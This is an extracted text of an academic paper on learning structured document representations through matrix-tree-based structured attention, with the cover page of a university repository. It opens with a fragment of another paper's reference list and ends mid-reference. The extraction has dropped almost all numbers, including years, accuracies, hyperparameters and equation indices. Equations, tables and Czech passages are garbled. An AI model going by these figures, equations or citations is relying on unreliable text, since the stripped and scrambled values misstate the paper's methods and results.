w.b. dolan. . data-driven response generation in social media. in proceedings of the conference on empirical methods in natural language processing, pages – . b. roark, r. sproat, c. allauzen, m. riley, j. sorensen, and t. tai. . the opengrm open-source finite- state grammar software libraries. in proceedings of the association for computational linguistics (system demonstrations), pages – . a. rozovskaya, m. sammons, j. gioja, and d. roth. . university of illinois system in hoo text cor- rection shared task. in proceedings of the european workshop on natural language generation, pages – . j. sachs. . talking about the there and then: the emergence of displaced reference in parent-child dis- course. children’s language, . k. sagae, a. lavie, and b. macwhinney. . auto- matic measurement of syntactic development in child language. in proceedings of the association for com- putational linguistics, pages – . s. sahakian and b. snyder. . automatically learn- ing measures of child language development. pro- ceedings of the association for computational lin- guistics (volume : short papers), pages – . c.e. snow, f. shonkoff, k. lee, and h. levin. . learning to play doctor: effects of sex, age, and ex- perience in hospital. discourse processes, ( ): – . e.l. stine and j.n. bohannon. . imitations, inter- actions, and language acquisition. journal of child language, ( ): – . x. sun, j. gao, d. micol, and c. quirk. . learning phrase-based spelling error models from clickthrough data. in proceedings of the association for computa- tional linguistics, pages – . p. suppes. . the semantics of children’s language. american psychologist, ( ): . t.z. tardif. . adult-to-child speech and language acquisition in mandarin chinese. ph.d. thesis, yale university. v. valian. . syntactic subjects in the early speech of american and italian children. cognition, ( - ): – . l. van houten. . role of maternal input in the acquisition process: the communicative strategies of adolescent and older mothers with their language learning children. in boston university conference on language development. a. warren-leubecker and j.n. bohannon iii. . into- nation patterns in child-directed speech: mother-father differences. child development, ( ): – . a. warren. . sex differences in speech to children. ph.d. thesis, georgia institute of technology. b. wilson and a.m. peters. . what are you cookin’ on a hot?: a three-year-old blind child’s ‘violation’ of universal constraints on constituent movement. lan- guage, : – . edinburgh research explorer learning structured text representations citation for published version: liu, y & lapata, m , 'learning structured text representations', transactions of the association for computational linguistics, vol. , pp. - . <https://transacl.org/ojs/index.php/tacl/article/view/ > link: link to publication record in edinburgh research explorer document version: publisher's pdf, also known as version of record published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. https://transacl.org/ojs/index.php/tacl/article/view/ https://www.research.ed.ac.uk/portal/en/publications/learning-structured-text-representations( cfe cfc- bee- bb - bd- c d e b e).html learning structured text representations yang liu and mirella lapata institute for language, cognition and computation school of informatics, university of edinburgh crichton street, edinburgh eh ab yang.liu @ed.ac.uk,mlap@inf.ed.ac.uk abstract in this paper, we focus on learning structure- aware document representations from data without recourse to a discourse parser or addi- tional annotations. drawing inspiration from recent efforts to empower neural networks with a structural bias (cheng et al., ; kim et al., ), we propose a model that can en- code a document while automatically induc- ing rich structural dependencies. specifically, we embed a differentiable non-projective pars- ing algorithm into a neural model and use at- tention mechanisms to incorporate the struc- tural biases. experimental evaluations across different tasks and datasets show that the pro- posed model achieves state-of-the-art results on document modeling tasks while inducing intermediate structures which are both inter- pretable and meaningful. introduction document modeling is a fundamental task in natural language processing useful to various downstream applications including topic labeling (xie and xing, ), summarization (chen et al., ; wolf and gibson, ), sentiment analysis (bhatia et al., ), question answering (verberne et al., ), and machine translation (meyer and webber, ). recent work provides strong evidence that better document representations can be obtained by incor- porating structural knowledge (bhatia et al., ; ji and smith, ; yang et al., ). inspired by ex- isting theories of discourse, representations of docu- ment structure have assumed several guises in the lit- erature, such as trees in the style of rhetorical struc- ture theory (rst; mann and thompson, ), graphs (lin et al., ; wolf and gibson, ), entity transitions (barzilay and lapata, ), or combinations thereof (lin et al., ; mesgar and strube, ). the availability of discourse anno- tated corpora (carlson et al., ; prasad et al., ) has led to the development of off-the-shelf discourse parsers (e.g., feng and hirst, ; liu and lapata, ), and the common use of trees as representations of document structure. for example, bhatia et al. ( ) improve document-level senti- ment analysis by reweighing discourse units based on the depth of rst trees, whereas ji and smith ( ) show that a recursive neural network built on the output of an rst parser benefits text categoriza- tion in learning representations that focus on salient content. linguistically motivated representations of doc- ument structure rely on the availability of anno- tated corpora as well as a wider range of standard nlp tools (e.g., tokenizers, pos-taggers, syntactic parsers). unfortunately, the reliance on labeled data, which is both difficult and highly expensive to pro- duce, presents a major obstacle to the widespread use of discourse structure for document modeling. moreover, despite recent advances in discourse pro- cessing, the use of an external parser often leads to pipeline-style architectures where errors propagate to later processing stages, affecting model perfor- mance. it is therefore not surprising that there have been attempts to induce document representations di- rectly from data without recourse to a discourse parser or additional annotations. the main idea is transactions of the association for computational linguistics, vol. , pp. – , . action editor: bo pang. submission batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. to obtain hierarchical representations by first build- ing representations of sentences, and then aggre- gating those into a document representation (tang et al., a,b). yang et al. ( ) further demon- strate how to implicitly inject structural knowledge onto the representation using an attention mecha- nism (bahdanau et al., ) which acknowledges that sentences are differentially important in differ- ent contexts. their model learns to pay more or less attention to individual sentences when constructing the representation of the document. our work focus on learning deeper structure- aware document representations, drawing inspira- tion from recent efforts to empower neural networks with a structural bias (cheng et al., ). kim et al. ( ) introduce structured attention networks which are generalizations of the basic attention pro- cedure, allowing to learn sentential representations while attending to partial segmentations or subtrees. specifically, they take into account the dependency structure of a sentence by viewing the attention mechanism as a graphical model over latent vari- ables. they first calculate unnormalized pairwise at- tention scores for all tokens in a sentence and then use the inside-outside algorithm to normalize the scores with the marginal probabilities of a depen- dency tree. without recourse to an external parser, their model learns meaningful task-specific depen- dency structures, achieving competitive results in several sentence-level tasks. however, for docu- ment modeling, this approach has two drawbacks. firstly, it does not consider non-projective depen- dency structures, which are common in document- level discourse analysis (hayashi et al., ; lee et al., ). as illustrated in figure , the tree struc- ture of a document can be flexible and the depen- dency edges may cross. secondly, the inside-outside algorithm involves a dynamic programming process which is difficult to parallelize, making it impracti- cal for modeling long documents. in this paper, we propose a new model for rep- resenting documents while automatically learning richer structural dependencies. using a variant of kirchhoff’s matrix-tree theorem (tutte, ), our model implicitly considers non-projective depen- in our experiments, adding the inside-outside pass in- creases training time by a factor of . the next time you hear a member of congress moan about the deficit, consider what congress did friday. the senate, - ,voted to increase to $ , the ceiling on insured mortgages from the fha, which lost $ . billion in loan defaults last year. then , by voice vote , the senate voted a porkbarrel bill, approved thursday by the house, for domestic military construction. the bush request to what the senators gave themselves. figure : the document is analyzed in the style of rhetorical structure theory (mann and thompson, ), and represented as a dependency tree fol- lowing the conversion algorithm of hayashi et al. ( ). dency tree structures. we keep each step of the learning process differentiable, so the model can be trained in an end-to-end fashion and induce dis- course information that is helpful to specific tasks without an external parser. the inside-outside model of kim et al. ( ) and our model both have a o(n ) worst case complexity. however, major operations in our approach can be parallelized ef- ficiently on gpu computing hardware. although our primary focus is on document modeling, there is nothing inherent in our model that prevents its ap- plication to individual sentences. advantageously, it can induce non-projective structures which are re- quired for representing languages with free or flexi- ble word order (mcdonald and satta, ). our contributions in this work are threefold: a model for learning document representations whilst taking structural information into account; an effi- cient training procedure which allows to compute document level representations of arbitrary length; and a large scale evaluation study showing that the proposed model performs competitively against strong baselines while inducing intermediate struc- tures which are both interpretable and meaningful. background in this section, we describe how previous work uses the attention mechanism for representing individual sentences. the key idea is to capture the interaction between tokens within a sentence, generating a con- text representation for each word with weak struc- tural information. this type of intra-sentence at- tention encodes relationships between words within u u u u u a a a a r r r r r figure : intra-sentential attention mechanism; aij denotes the normalized attention score between tokens ui and uj. each sentence and differs from inter-sentence at- tention which has been widely applied to sequence transduction tasks like machine translation (bah- danau et al., ) and learns the latent alignment between source and target sequences. figure provides a schematic view of the intra- sentential attention mechanism. given a sen- tence represented as a sequence of n word vectors [u ,u , · · · ,un], for each word pair 〈ui,uj〉, the attention score aij is estimated as: fij = f(ui,uj) ( ) aij = exp(fij)∑n k= exp(fik) ( ) where f() is a function for computing the unnor- malized score fij which is then normalized by cal- culating a probability distribution aij. individual words collect information from their context based on aij and obtain a context representation: ri = n∑ j= aijuj ( ) where attention score aij indicates the (dependency) relation between the i-th and the j-th-words and how information from uj should be fed into ui. despite successful application of the above atten- tion mechanism in sentiment analysis (cheng et al., ) and entailment recognition (parikh et al., ), the structural information under considera- tion is shallow, limited to word-word dependencies. since attention is computed as a simple probabil- ity distribution, it cannot capture more elaborate structural dependencies such as trees (or graphs). kim et al. ( ) induce richer internal structure by imposing structural constraints on the probabil- ity distribution computed by the attention mecha- nism. specifically, they normalize fij with a pro- jective dependency tree using the inside-outside al- gorithm (baker, ): fij = f(ui,uj) ( ) a = inside-outside(f) ( ) ri = n∑ j= aijuj ( ) this process is differentiable, so the model can be trained end-to-end and learn structural information without relying on a parser. however, efficiency is a major issue, since the inside-outside algorithm has time complexity o(n ) (where n represents the number of tokens) and does not lend itself to easy parallelization. the high order complexity renders the approach impractical for real-world applications. encoding text representations in this section we present our document representa- tion model. we follow previous work (tang et al., a; yang et al., ) in modeling documents hierarchically by first obtaining representations for sentences and then composing those into a document representation. structural information is taken into account while learning representations for both sen- tences and documents and an attention mechanism is applied on both words within a sentence and sen- tences within a document. the general idea is to force pair-wise attention between text units to form a non-projective dependency tree, and automatically induce this tree for different natural language pro- cessing tasks in a differentiable way. in the follow- ing, we first describe how the attention mechanism is applied to sentences, and then move on to present our document-level model. . sentence model let t = [u ,u , · · · ,un] denote a sentence con- taining a sequence of words, each represented by a vector u, which can be pre-trained on a large cor- pus. long short-term memory neural networks (lstms; hochreiter and schmidhuber, ) have u u u u d d d d e e e e calculat e st ruct ured at t ent ion updat e sem ant ic vect ors r r r r figure : sentence representation model: ut is the input vector for the t-th word, et and dt are semantic and structure vectors, respectively. been successfully applied to various sequence mod- eling tasks ranging from machine translation (bah- danau et al., ), to speech recognition (graves et al., ), and image caption generation (xu et al., ). in this paper we use bidirectional lstms as a way of representing elements in a se- quence (i.e., words or sentences) together with their contexts, capturing the element and an “infinite” window around it. specifically, we run a bidirec- tional lstm over sentence t , and take the output vectors [h ,h , · · · ,hn] as the representations of words in t , where ht ∈ rk is the output vector for word ut based on its context. we then exploit the structure of t which we in- duce based on an attention mechanism detailed be- low to obtain more precise representations. inspired by recent work (daniluk et al., ; miller et al., ), which shows that the conventional way of us- ing lstm output vectors for calculating both atten- tion and encoding word semantics is overloaded and likely to cause performance deficiencies, we decom- pose the lstm output vector in two parts: [et,dt] = ht ( ) where et ∈ rkt , the semantic vector, encodes se- mantic information for specific tasks, and dt ∈ rks , the structure vector, is used to calculate structured attention. we use a series of operations based on the matrix- tree theorem (tutte, ) to incorporate the struc- tural bias of non-projective dependency trees into the attention weights. we constrain the probabil- ity distributions aij (see equation ( )) to be the posterior marginals of a dependency tree structure. we then use the normalized structured attention, to build a context vector for updating the semantic vector of each word, obtaining new representations [r ,r , · · · ,rn]. an overview of the model is pre- sented in figure . we describe the attention mech- anism in detail in the following section. . structured attention mechanism dependency representations of natural language are a simple yet flexible mechanism for encoding words and their syntactic relations through directed graphs. much work in descriptive linguistics (melc̆uk, ; tesniére, ) has advocated their suitability for representing syntactic structure across languages. a primary advantage of dependency representations is that they have a natural mechanism for representing discontinuous constructions arising from long dis- tance dependencies or free word order through non- projective dependency edges. more formally, building a dependency tree amounts to finding latent variables zij for all i = j, where word i is the parent node of word j, un- der some global constraints, amongst which the single-head constraint is the most important, since it forces the structure to be a rooted tree. we use a variant of kirchhoff’s matrix-tree theorem (koo et al., ; tutte, ) to calculate the marginal probability of each dependency edge p(zij = ) of a non-projective dependency tree, and this probabil- ity is used as the attention weight that decides how much information is collected from child unit j to the parent unit i. we first calculate unnormalized attention scores fij with structure vector d (see equation ( )) via a bilinear function: tp = tanh(wpdi) ( ) tc = tanh(wcdj) ( ) fij = t t p watc ( ) where wp ∈ rks∗ks and wc ∈ rks∗ks are the weights for building the representation of parent and child nodes. wa ∈ rks∗ks is the weight for the bi- linear transformation. f ∈ rn∗n can be viewed as a weighted adjacency matrix for a graph g with n nodes where each node corresponds to a word in a sentence. we also calculate the root score fri , indi- cating the unnormalized possibility of a node being the root: fri = wrdi ( ) where wr ∈ r ∗ks . we calculate p(zij = ), the marginal probability of the dependency edge, fol- lowing koo et al. ( ): aij = { if i = j exp(fij) otherwise ( ) lij = {∑n i′= ai′j if i = j −aij otherwise ( ) l̄ij = { exp(fri ) i = lij i > ( ) p(zij = ) = ( − δ ,j)aij[l̄− ]jj − ( −δi, )aij[l̄− ]ji ( ) p(root(i)) = exp(fir)[l̄ − ]i where ≤ i ≤ n, ≤ j ≤ n. l ∈ rn∗n is the laplacian matrix for graph g and l̄ ∈ rn∗n is a variant of l that takes the root node into consid- eration, and δ is the kronecker delta. the key for the calculation to hold is for lii, the minor of the laplacian matrix l with respect to row i and col- umn i, to be equal to the sum of the weights of all directed spanning trees of g which are rooted at i. p(zij = ) is the marginal probability of the dependency edge between the i-th and j-th words. p(root(i) = ) is the marginal probability of the i- th word headed by the root of the tree. details of the proof can be found in koo et al. ( ). we denote the marginal probabilities p(zij = ) as aij and p(root(i)) as ari . this can be inter- preted as attention scores which are constrained to converge to a structured object, a non-projective de- pendency tree, in our case. we update the semantic vector ei of each word with structured attention: pi = n∑ k= akiek + a r i eroot ( ) ci = n∑ k= aikei ( ) ri = tanh(wr[ei,pi,ci]) ( ) where pi ∈ rke is the context vector gathered from possible parents of ui and ci ∈ rke the context vec- tor gathered from possible children, and eroot is a special embedding for the root node. the context vectors are concatenated with ei and transformed with weights wr ∈ rke∗ ke to obtain the updated semantic vector ri ∈ rke with rich structural infor- mation (see figure ). . document model we build document representations hierarchically: sentences are composed of words and documents are composed of sentences. composition on the doc- ument level also makes use of structured attention in the form of a dependency graph. dependency- based representations have been previously used for developing discourse parsers (hayashi et al., ; li et al., ) and in applications such as summa- rization (hirao et al., ). as illustrated in figure , given a document with n sentences [s ,s , · · · ,sn], for each sen- tence si, the input is a sequence of word embed- dings [ui ,ui , · · · ,uim], where m is the number of tokens in si. by feeding the embeddings into a sentence-level bi-lstm and applying the pro- posed structured attention mechanism, we obtain the updated semantic vector [ri ,ri , · · · ,rim]. then a pooling operation produces a fixed-length vec- tor vi for each sentence. analogously, we view the document as a sequence of sentence vectors [v ,v , · · · ,vn] whose embeddings are fed to a document-level bi-lstm. application of the struc- tured attention mechanism creates new semantic vectors [q ,q , · · · ,qn] and another pooling oper- ation yields the final document representation y. . end-to-end training our model can be trained in an end-to-end fashion since all operations required for computing struc- tured attention and using it to update the semantic u i u i u im y st ruct ured at t ent ion r i r i r im v vi vn q q i qn pooling pooling st ruct ured at t ent ion figure : document representation model. vectors are differentiable. in contrast to in kim et al. ( ), training can be done efficiently. the major complexity of our model lies in the computation of the gradients of the the inverse matrix. let a denote a matrix depending on a real parameter x; assuming all component functions in a are differentiable, and a is invertible for all possible values, the gradient of a with respect respect to x is: da− dx = −a− da dx a− ( ) multiplication of the three matrices and matrix in- version can be computed efficiently on modern par- allel hardware architectures such as gpus. in our experiments, computation of structured attention takes only / of training time. experiments in this section we present our experiments for eval- uating the performance of our model. since sen- tence representations constitute the basic building blocks of our document model, we first evalu- ate the performance of structured attention on a sentence-level task, namely natural language infer- ence. we then assess the document-level repre- sentations obtained by our model on a variety of classification tasks representing documents of dif- ferent length, subject matter, and language. our code is available at https://github.com/ nlpyang/structured. . natural language inference the ability to reason about the semantic relation- ship between two sentences is an integral part of text understanding. we therefore evaluate our model on recognizing textual entailment, i.e., whether two premise-hypothesis pairs are entailing, con- tradictory, or neutral. for this task we used the stanford natural language inference (snli) dataset (bowman et al., ), which contains premise-hypothesis pairs and target labels indicat- ing their relation. after removing sentences with unknown labels, we obtained , pairs for train- ing, , for development and , for testing. sentence-level representations obtained by our model (with structured attention) were used to en- code the premise and hypothesis by modifying the model of parikh et al. ( ) as follows. let [x p , · · · ,x p n] and [xh , · · · ,xhm] be the input vectors for the premise and hypothesis, respectively. appli- cation of structured attention yields new vector rep- resentations [rp , · · · ,r p n] and [rh , · · · ,rhm]. then we combine these two vectors with inter-sentential attention, and apply an average pooling operation: oij = mlp(r p i ) t mlp(rhj ) ( ) r̄ p i = [r p i , m∑ j= exp(oij)∑m k= exp(oik) ] ( ) r̄hi = [r h i , m∑ i= exp(oij)∑m k= exp(okj) ] ( ) rp = n∑ i= g(r̄ p i ), r h = m∑ i= g(r̄hi ) ( ) where mlp() is a two-layer perceptron with a relu activation function. the new representa- tions rp,rh are then concatenated and fed into an- other two-layer perceptron with a softmax layer to obtain the predicted distribution over the labels. the hidden size of the lstm was set to . the dimensions of the semantic vector were and the dimensions of structure vector were . we used pretrained -d glove b (pennington et al., ) vectors to initialize the word embeddings. all parameters (including word embeddings) were up- dated with adagrad (duchi et al., ), and the models acc θ classifier with handcrafted features (bowman et al., ) . — d lstm encoders (bowman et al., ) . . m d stack-augmented parser-interpreter neural net (bowman et al., ) . . m d lstm with inter-attention (rocktäschel et al., ) . k d matching lstms (wang and jiang, ) . . m d lstmn with deep attention fusion (cheng et al., ) . . m decomposable attention over word embeddings (parikh et al., ) . k enhanced bilstm inference model (chen et al., ) . . m d no attention . k d simple intra-sentence attention . . m d structured intra-sentence attention with inside-outside . . m d structured intra-sentence attention with matrix inversion . . m table : test accuracy on the snli dataset and number of parameters θ (excluding embeddings). wherever available we also provide the size of the recurrent unit. models speed max avg no attention . . simple attention . . matrix inversion . . inside-outside . . table : comparison of speed of different models on the snli testset. the unit of measurement is seconds per instance. all results were obtained on a geforce gtx titan x (pascal) gpu. learning rate was set to . . the hidden size of the two-layer perceptron was set to and dropout was used with ratio . . the mini-batch size was . we compared our model (and variants thereof) against several related systems. results (in terms of -class accuracy) are shown in table . most pre- vious systems employ lstms and do not incorpo- rate a structured attention component. exceptions include cheng et al. ( ) and parikh et al. ( ) whose models include intra-attention encoding rela- tionships between words within each sentence (see equation ( )). it is also worth noting that some models take structural information into account in the form of parse trees (bowman et al., ; chen et al., ). the second block of table presents a version of our model without an intra-sentential at- tention mechanism as well as three variants with at- tention, assuming the structure of word-to-word re- dataset #class #docs #s/d #w/d yelp k . . imdb k . . cz movies k . . debates . k . . table : dataset statistics; #class is the number of classes per dataset, #docs denotes the number of documents; #s/d and #w/d represent the average number of sentences and words per document. lations and dependency trees. in the latter case we compare our matrix inversion based model against kim et al.’s ( ) inside-outside attention model. consistent with previous work (cheng et al., ; parikh et al., ), we observe that simple attention brings performance improvements over no attention. structured attention further enhances performance. our own model with tree matrix inversion slightly outperforms the inside-outside model of kim et al. ( ), overall achieving results in the same ball- park with related lstm-based models (chen et al., ; cheng et al., ; parikh et al., ). table compares the running speed of the mod- els shown in the second block of table . as can be seen matrix inversion does not increase running speed over the simpler attention mechanism and is considerably faster compared to inside-outside. the latter is – times slower than our model on the same platform. models yelp imdb cz movies debates θ feature-based classifiers . . . . — paragraph vector (tang et al., a) . . — —- — convolutional neural network (tang et al., a) . — — — — convolutional gated rnn (tang et al., a) . . — — — lstm gated rnn (tang et al., a) . . — — — rst-based recursive neural network (ji and smith, ) — — — . — d hierarchical attention networks (yang et al., ) . . . . k d no attention . . . . k d simple attention . . . . k d structured attention (sentence-level) . . . . k d structured attention (document-level) . . . . k d structured attention (both levels) . . . . k table : test accuracy on four datasets and number of parameters θ (excluding embeddings). regarding feature-based classification methods, results on yelp and imdb are taken from tang et al. ( a), on cz movies from brychcın and habernal ( ), and debates from yogatama and smith ( ). wherever available we also provide the size of the recurrent unit (lstm or gru). . document classification in this section, we evaluate our document-level model on a variety of classification tasks. we se- lected four datasets which we describe below. ta- ble summarizes some statistics for each dataset. yelp reviews were obtained from the yelp dataset challenge. this dataset contains restaurant reviews, each associated with human ratings on a scale from (negative) to (positive) which we used as gold labels for sentiment classification; we fol- lowed the preprocessing introduced in tang et al. ( a) and report experiments on their training, de- velopment, and testing partitions ( / / ). imdb reviews were obtained from diao et al. ( ), who randomly crawled reviews for k movies. each review is associated with user ratings ranging from to . czech reviews were obtained from brychcın and habernal ( ). the dataset contains reviews from the czech movie database each labeled as positive, neutral, or negative. we include czech in our exper- iments since it has more flexible word order com- pared to english, with non-projective dependency structures being more frequent. experiments on this dataset perform -fold cross-validation following previous work (brychcın and habernal, ). http://www.csfd.cz/ congressional floor debates were obtained from a corpus originally created by thomas et al. ( ) which contains transcripts of u.s. floor debates in the house of representatives for the year . each debate consists of a series of speech segments, each labeled by the vote (“yea” or “nay”) cast for the proposed bill by the the speaker of each segment. we used the pre-processed corpus from yogatama and smith ( ). following previous work (yang et al., ), we only retained words appearing more than five times in building the vocabulary and replaced words with lesser frequencies with a special unk to- ken. word embeddings were initialized by training word vec (mikolov et al., ) on the training and validation splits of each dataset. in our experiments, we set the word embedding dimension to be and the hidden size for the sentence-level and document- level lstms to (the dimensions of the semantic and structure vectors were set to and , respec- tively). we used a mini-batch size of during train- ing and documents of similar length were grouped in one batch. parameters were optimized with adagrad (duchi et al., ), the learning rate was set to . . we used l regularization for all parameters except word embeddings with regularization constant set to e− . dropout was applied on the input and output http://www.cs.cornell.edu/˜ainur/data. html three men drink at a reflective bar three men are socializing during happy hour premise hypothesis workers at basking robbins are filling orders workers filling orders at basking robbins figure : dependency trees induced by our model on the snli test set. layers with dropout rate . . our results are summarized in table . we com- pared our model against several related models cov- ering a wide spectrum of representations including word-based ones (e.g., paragraph vector and cnn models) as well as hierarchically composed ones (e.g., a cnn or lstm provides a sentence vector and then a recurrent neural network combines the sentence vectors to form a document level represen- tation for classification). previous state-of-the-art results on the three review datasets were achieved by the hierarchical attention network of yang et al. ( ), which models the document hierarchically with two grus and uses an attention mechanism to weigh the importance of each word and sentence. on the debates corpus, ji and smith ( ) obtained best results with a recursive neural network model operating on the output of an rst parser. table presents three variants of our model, one with struc- tured attention on the sentence level, another one with structured attention on the document level and a third model which employs attention on both levels. as can be seen, the combination is beneficial achiev- ing best results on three out of four datasets. further- more, structured attention is superior to the simpler word-to-word attention mechanism, and both types of attention bring improvements over no attention. the structured attention approach is also very effi- cient, taking only minutes for one training epoch on the largest dataset. . analysis of induced structures to gain further insight on structured attention, we inspected the dependency trees it produces. specifically, we used the chu-liu-edmonds algo- we do not report comparisons with the inside-outside ap- proach on document classification tasks due to its prohibitive computation cost leading to hours of training for one epoch. parser attention projective — . % height . . nodes depth . % . % depth . % . % depth . % . % depth . % . % depth . % . % depth . % . % same edges . % table : descriptive statistics for dependency trees produced by our model and the stanford parser (manning et al., ) on the snli test set. rithm (chu and liu, ; edmonds, ) to ex- tract the maximum spanning tree from the attention scores. we report various statistics on the character- istics of the induced trees across different tasks and datasets. we also provide examples of tree output, in an attempt to explain how our model uses depen- dency structures to model text. sentence trees we compared the dependency trees obtained from our model with those produced by a state-of-the-art dependency parser trained on the english penn treebank. table presents various statistics on the depth of the trees produced by our model on the snli test set and the stanford depen- dency parser (manning et al., ). as can be seen, the induced dependency structures are simpler com- pared to those obtained from the stanford parser. the trees are generally less deep (their height is . compared to . for the stanford parser), with the majority being of depth – . almost half of the induced trees have a projective structure, although there is nothing in the model to enforce this con- straint. we also calculated the percentage of head- dependency edges that are identical between the two yelp imdb cz movies debates projective . % . % . % . % height . . . . nodes depth . % . % . % . % depth . % . % . % . % depth . % . % . % . % depth . % . % . % . % table : descriptive statistics for induced document-level dependency trees across datasets. sets of trees. although our model is not exposed to annotated trees during training, a large number of edges agree with the output of the stanford parser. figure shows examples of dependency trees in- duced on the snli dataset. although the model is trained without ever being exposed to a parse tree, it is able to learn plausible dependency structures via the attention mechanism. overall we observe that the induced trees differ from linguistically mo- tivated ones in the types of dependencies they cre- ate which tend to be of shorter length. the depen- dencies obtained from structured attention are more direct as shown in the first premise sentence in fig- ure where words at and bar are directly connected to the verb drink. this is perhaps to be expected since the attention mechanism uses the dependency structures to collect information from other words, and the direct links will be more effective. document trees we also used the chu-liu- edmonds algorithms to obtain document-level de- pendency trees. table summarizes various charac- teristics of these trees. for most datasets, document- level trees are not very deep, they mostly contain up to nodes of depth . this is not surprising as the documents are relatively short (see table ) with the exception of debates which are longer and the induced trees more complex. the fact that most documents exhibit simple discourse structures is fur- ther corroborated by the large number (over %) of projective trees induced on yelp, imbd, and cz movies datasets. unfortunately, our trees cannot be directly compared with the output of a discourse parser which typically involves a segmentation pro- cess splitting sentences into smaller units. our trees are constructed over entire sentences, and there is no mechanism currently in the model to split sentences (a) first of all, i did not expect to come into a cafeteria style eatery. they serve the basics of bbq, nothing too fancy. a few appetizers and side options, like cheesy potatoes, baked mac 'n' cheese, fresh corn bread, etc.. all were very tasty. for entree, they have a wide variety of meats and combos and samplers. overall, this is a great place,... meat was well prepared, a little pricey for what i was expecting. (b) great instruction by ryan clean workout facility and friendly people they have a new student membership for per month and classes are mon , weds and fri pm pm it 's definitely worth money if you want to learn brazilian jiu jitsu i usually go to classes on mondays and fridays , and it 's the best workout i 've had in years (c) ud?lat parodii tak, aby nebyla je?t? trapn?j?í ne? p?vodní film, není zrovna legrace, o tom jsem se p?esv?d?ila u? n?kolikrát (bul?it, scary movie...). to make a parody so that it ends up being even more embarrassing than the original movie is not exactly trivial, this i have been convinced of several times already (bullshit, scary movie...). jen?e top secret? but top secret? nevím, jestli to v?bec m??u ?íct, ale mo?ná tenhle film p?ekonal i skv?lé ?havé výst?ely! i don't know if i can actually say it, but maybe this movie has scored even better than the fantastic hot shots! bo?e, to jsem se nasmála! god, i laughed a lot! nutno uznat, ?e je to docela síla, kdy? si ameri?ané d?lali p?ed revolucí takovou srandu z n?mc?. i must admit, that it's pretty cool, when americans were making so much fun of germans before the revolution. ty nará?ky byly vá?n? skv?lé... jedna z nejlep?ích parodií, co jsem kdy vid?la! the innuendos were really great... one of the best parodies i have ever seen! figure : induced dependency trees for three docu- ments taken from yelp (a,b) and the czech movies dataset (c). english translations are in italics. into discourse units. figure shows examples of document-level trees taken from yelp and the czech movie dataset. in the first tree, most edges are examples of the “elab- oration” discourse relation, i.e., the child presents additional information about the parent. the sec- ond tree is non-projective, the edges connecting sen- tences and and and cross. the third review, perhaps due to its colloquial nature, is not entirely coherent. however, the model manages to link sen- tences and to sentence , i.e., the movie being discussed; it also relates sentence to , both of which express highly positive sentiment. conclusions in this paper we proposed a new model for rep- resenting documents while automatically learning rich structural dependencies. our model normalizes intra-attention scores with the marginal probabilities of a non-projective dependency tree based on a ma- trix inversion process. each operation in this pro- cess is differentiable and the model can be trained efficiently end-to-end, while inducing structural in- formation. we applied this approach to model doc- uments hierarchically, incorporating both sentence- and document-level structure. experiments on sen- tence and document modeling tasks show that the representations learned by our model achieve com- petitive performance against strong comparison sys- tems. analysis of the induced tree structures re- vealed that they are meaningful, albeit different from linguistics ones, without ever exposing the model to linguistic annotations or an external parser. directions for future work are many and varied. given appropriate training objectives (linzen et al., ), it should be possible to induce linguistically meaningful dependency trees using the proposed at- tention mechanism. we also plan to explore how document-level trees can be usefully employed in summarization, e.g., as a means to represent or even extract important content. acknowledgments the authors gratefully ac- knowledge the support of the european research council (award number ). we also thank the anonymous tacl reviewers and the action editor whose feedback helped improve the present paper, members of edinburghnlp for helpful discussions and suggestions, and barbora skarabela for translat- ing the czech document for us. references dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . neural machine translation by jointly learning to align and translate. in proceed- ings of the iclr conference. james k. baker. . trainable grammars for speech recognition. the journal of the acousti- cal society of america (s ):s –s . regina barzilay and mirella lapata. . mod- eling local coherence: an entity-based approach. computational linguistics ( ): – . parminder bhatia, yangfeng ji, and jacob eisen- stein. . better document-level sentiment analysis from rst discourse parsing. in pro- ceedings of the emnlp conference. pages – . samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. . a large annotated corpus for learning natural language in- ference. in proceedings of the emnlp confer- ence. pages – . samuel r. bowman, jon gauthier, abhinav ras- togi, raghav gupta, christopher d. manning, and christopher potts. . a fast unified model for parsing and sentence understanding. in proceed- ings of the acl conference. pages – . tomáš brychcın and ivan habernal. . unsu- pervised improving of sentiment analysis using global target context. in proceedings of the inter- national conference on recent advances in nat- ural language processing. pages – . lynn carlson, daniel marcu, and mary ellen okurowski. . building a discourse-tagged corpus in the framework of rhetorical structure theory. in proceedings of the second sigdial workshop on discourse and dialogue. qian chen, xiaodan zhu, zhen-hua ling, si wei, hui jiang, and diana inkpen. . enhanced lstm for natural language inference. in pro- ceedings of the acl conference. pages – . qian chen, xiaodan zhu, zhenhua ling, si wei, and hui jiang. . distraction-based neural networks for modeling documents. in proceed- ings of the ijcai conference. pages – . jianpeng cheng, li dong, and mirella lapata. . long short-term memory-networks for machine reading. in proceedings of the emnlp confer- ence. pages – . yoeng-jin chu and tseng-hong liu. . on shortest arborescence of a directed graph. scien- tia sinica ( ): . michał daniluk, tim rocktäschel, johannes welbl, and sebastian riedel. . frustratingly short attention spans in neural language modeling. pro- ceedings of the iclr conference . qiming diao, minghui qiu, chao-yuan wu, alexander j smola, jing jiang, and chong wang. . jointly modeling aspects, ratings and senti- ments for movie recommendation (jmars). in proceedings of the acm sigkdd conference. pages – . john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. journal of machine learning research (jul): – . jack edmonds. . optimum branchings. journal of research of the national bureau of standards b ( ): – . vanessa wei feng and graeme hirst. . text- level discourse parsing with rich linguistic fea- tures. in proceedings of the acl conference. pages – . alex graves, abdel-rahman mohamed, and geof- frey hinton. . speech recognition with deep recurrent neural networks. in proceedings of the ieee icassp conference. pages – . katsuhiko hayashi, tsutomu hirao, and masaaki nagata. . empirical comparison of depen- dency conversions for rst discourse trees. in pro-ceedings of the annual meeting of sigdial. page . tsutomu hirao, yasuhisa yoshida, masaaki nishino, norihito yasuda, and masaaki nagata. . single-document summarization as a tree knapsack problem. in proceedings of the emnlp conference. pages – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation 